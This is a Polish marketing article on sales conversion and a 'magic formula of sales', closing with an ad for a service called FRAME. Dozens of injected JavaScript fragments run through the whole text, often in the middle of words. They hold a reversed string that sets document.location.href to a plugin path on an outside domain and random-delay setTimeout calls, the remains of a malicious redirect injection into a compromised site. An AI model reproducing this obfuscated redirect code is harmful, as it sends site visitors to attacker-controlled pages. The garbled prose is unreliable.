In Artykuły, Handel, Uniwersalne

Konwersja toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to s toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosunek liczby transakcji sprzedażowych toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do liczby kontaktów z firmą. Ta liczba kontaktów powinna być rozumiana szeroko, w szczególności chodzi zarówno o kontakty off-line, on-line, jak i telefoniczne, a także w każdy inny sposób.

Uwaga. „konwersja „czy” i konwersja „kiedy”. W konwersji nie tylko chodzi o toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, czy transakcja w ogóle miała miejsce. Ale też o toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, kiedy je miała. Gdyż wcześniejsze rozpoczęcie procesu kupowania zwiększa szansę nie tyle na wyższą konwersję, ile na wyższą średnią kwotę transakcji.

Konwersja jest jednym ze składników większego mechanizmu opisującego działanie Konceptu Sprzedażowego, czyli magicznej formuły sprzedaży.

Model Biznesowy stanowi obutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowę dla przewagi konkurencyjnej. A jego witoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doczna i odczuwalna dla klienta część toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to Koncept Sprzedażowy. To wprawdzie tylko część Modelu, ale na tyle specyficzna, że war toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to patrzeć na nią osobno. Szczególnie że ułatwia toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zarządzanie sprzedażą. Zaś w tym aspekcie magiczna formuła opisuje i wyjaśnia działanie Konceptu Sprzedażowego.

Magiczna formuła sprzedaży

Czyli przedstawienie jej nie jako coś, co jest zmienną niezależną, tylko jako ciąg wzajemnie powiązanych ze sobą związkiem przyczynowo – skutkowym zdarzeń, które są z kolei efektem decyzji, podejmowanych tak przez klienta, jak i przez samą firmę.

Już samo przedstawienie sprzedaży jako ciągu zdarzeń ma znaczenie. Pomaga bowiem zrozumieć, skąd sprzedaż się bierze i jak przebiega. Ale toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie jest w formule najważniejsze. Najważniejsze jest toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, że magiczną formułą można zarządzać, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to znaczy operacyjnie wpływać na poszczególne składniki.

Takie zarządzanie pozwala wytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobyć z Modelu Biznesowego toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatkowe możliwości, zwykle na poziomie 20% stanu wyjściowego. Ale że wymaga wzmożonego wysiłku, samo się nie zdarzy. Tu organizację trzeba zmusić, sama się nie zmobilizuje.

To zarządzanie ma swój wymiar także czasowy, choć różny dla różnych składników. Najtrudniej i najdłużej zmienia się odwiedzalność, łatwiej i szybciej jest właśnie z konwersją. Najłatwiej i najszybciej zwykle idzie ze średnią war toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tością transakcji.

Zarządzanie formułą ma miejsce także w krótkim okresie, w czasie pojedynczej interakcji Konceptu z klientem. Ta zasada toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotyczy jak najbardziej także konwersji, która przez toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ma wymiar czasowy, w myśl reguły, że im dłużej trwa interakcja i im więcej ich będzie, tym konwersja będzie większa.

Innymi parametrami też można zarządzać w trakcie jednej interakcji, np. w przypadku odwiedzalności można sterować klientem, gdzie i kiedy pójdzie. Średnią transakcją też można sterować, tu obowiązuje potoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobna zasada jak z konwersją – czas działa na jej korzyść.

Uwaga. „chodzi o statystykę”. Statystykę podjęcia każtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorazowo decyzji przez klienta, ale i statystykę natknięcia się przez niego na produkt. Ta interakcja klienta (w odpowiednim nastroju), produktu (toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobranego toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do miejsca i czasu) i miejsca (tzw. gorącego) zwiększa prawtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobieństwo decyzji zakupowej. I im więcej będzie takich miejsc zetknięcia, tym większa szansa na łączną wysoką konwersję.

Produkt ma warstwy. I wszystkie warstwy wchodzą w interakcję z klientem w procesie konwersji.

Konwersja toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zawsze decyzja klienta. Ale zwykle też jest skutkiem jakiejś decyzji samej firmy.

Ale konwersja ma dwa wymiary, nie tylko czasowy, ale i przestrzenny.

Konwersja w czasie. Przez toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, że tu na klienta działa wiele czynników. I żeby je zauważyć, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doświadczyć czy wejść z nimi w interakcję, potrzeby jest czas.

Koncept Sprzedażowy działa na klienta nieustannie. I toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to działanie, jak w teatrze wzmaga się w czasie, gdyż bodźce się na siebie nakładają.

Jeśli klient tylko będzie w placówce siedział, czy zaloguje się na jej stronie interne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towej, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wprawdzie konwersja będzie rosła w czasie, ale nie tak szybko, jak wtedy, gdy będzie się tam poruszał. Gdyż wtedy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dojdzie element prawtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobieństwa natknięcia się na elementy mikro sterowania na poziomie mikro formuły.

Poziom wyjściowy

Konwersja ma zawsze swój poziom wyjściowy. Ten poziom zależy od Konceptu Sprzedażowego firmy, ale też od lokalnego wdrożenia i wykonania tego Konceptu w praktyce.

Zależność konwersji od Konceptu Sprzedażowego można wykorzystać już na etapie jego tworzenia. Można manipulować jego elementami, w szczególności składnikami „twardymi”, czyli takimi których nie można pominąć w procesie sprzedażowym (elementy miękkie tylko ten proces umilają, choć i one mają wpływ na poziom konwersji, choć już mniejszy).

Na wykorzystanie możliwości Modelu wpływa zagospodarowanie trzech obszarów. Pierwszy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to przede wszystkim zarządzanie codziennością, podstawa działania firmy i warunek wykorzystania pierwszych 80% możliwości. Następnie można zarządzać formułami, co w dużym s toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topniu sprowadza się toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do przymuszenia firmy, aby działała ponad wygodne 20% wysiłku, 80% możliwości. Można tez wyjść poza możliwości Modelu i sięgnąć po więcej, ale wtedy trzeba już ten Model zmienić.

To wykorzystanie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotyczy wszystkich składników obu formuł, sprzedaży i przedsiębiorstwa, więc i jak najbardziej konwersji, składnika magicznej formuły sprzedaży.

Jednym z elementów Konceptu, czy bardziej skutkiem tych elementów jest czas przebywania z firmą, a także długość drogi, jaką klient przejdzie. I toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to te elementy najbardziej wpływają na konwersję.

Najważniejszy jest czas

Gdyż czas ten przekłada się na liczbę mikrozdarzeń, z jakimi styka się klient. Każde takie mikrozdarzenie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to mikro szansa, że uda się jednak przekonać klienta.

Czas jest najważniejszy. Ale nie wystarczy. Jeśli klient tylko siedzi czy biernie obserwuje, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nawet długi czas interakcji niewiele pomoże w zwiększeniu konwersji. Tu bowiem chodzi o liczbę mikrozdarzeń, a ta liczba zależy nie tylko od czasu interakcji, ale też od tego, czy i jak klient się przemieszcza. Zdarzenia mają bowiem swój wymiar nie tylko w czasie, ale przede wszystkim w miejscu. Każde mikrozdarzenie ma swoje miejsce i klient musi tam toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopiero toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotrzeć. A toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopiero takie zdarzenie jest okazją toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do sterowania sprzedażą na poziomie mikro.

Dopiero wynikająca z czasu interakcji i przebytej ścieżki pozwoli zwiększyć konwersję. Dlatego liczy się też długość.

Liczy się też długość

A nie tylko czas. Firma widzi tylko początek – czyli wejście w interakcję z firmą. Oraz koniec, czyli końcową konwersję, tak naprawdę wynikową. Tymczasem po drodze dzieje się wiele rzeczy, ma miejsce wiele mikro formuł sprzedaży, które podlegają mikro sterowaniu na swoim poziomie.

Każda z mikro formuł ma swoją, właściwą sobie konwersję. Zarówno na poziomie wyjściowym, jak i na poziomie lepszego lub gorszego wykonania (zarządzanie codziennością), jak i na poziomie zarządzania formułą.

W praktyce działa toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tak, że trzeba połączyć właściwy produkt z właściwym miejsce, czasem właściwym sposobem przedstawienia. Jeśli np. na wejściu są bardzo drogie produkty, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wprawdzie będzie je widać, ale mało k toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to je kupi. Takie produkty raczej kupuje się w ciszy i spokoju, więc właściwe dla nich miejsce jest w głębi, czasem w pobliżu specjalnej infrastruktury sprzedażowej, jak biurka toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do intensywnej obsługi czy punkty INFO.

Podsumowanie

Konwersja toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to inaczej s toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosunek liczby kupujących toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do liczby nawiązujących kontakt z firmą. Jednak ta liczba nie jest dana (choć w największym s toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topniu zdeterminowana samym Konceptem Sprzedażowym). Można na nią wpływać, już na etapie tworzenia tego Konceptu, jak i później na etapie jego wdrożenia, w końcu zaś wykonywania. Co najważniejsze, można oddziaływać na te zachowania na poziomie mikro, na poziomie jednorazowych zdarzeń. A im więcej tych zdarzeń, tym większa szansa na przekonanie klienta. Tu więc liczy się czas interakcji i liczba mikro sytuacji, z jakimi zetknie się klient.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.